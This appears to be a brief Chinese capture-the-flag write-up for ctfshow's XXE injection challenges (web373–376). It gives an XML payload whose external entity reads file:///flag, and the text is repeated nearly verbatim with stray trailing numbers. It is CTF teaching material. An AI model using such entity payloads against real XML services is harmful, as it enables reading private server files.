前言
XXE 的漏洞在我的上一篇文章有讲过,这里就不多说,直接看题
XXE外部实体注入
web373

有回显的文件读取
<?xml version="1.0"?>
<!DOCTYPE xml [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<paidx0>
<ctfshow>&xxe;</ctfshow>
</paidx0>

web374~376

无回显的文件读取,禁用了版本号,问题不大不写
XXE 的漏洞在我的上一篇文章有讲过,这里就不多说,直接看题
XXE外部实体注入

有回显的文件读取
<?xml version="1.0"?>
<!DOCTYPE xml [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<paidx0>
<ctfshow>&xxe;</ctfshow>
</paidx0>


无回显的文件读取,禁用了版本号,问题不大不写
3209
625
200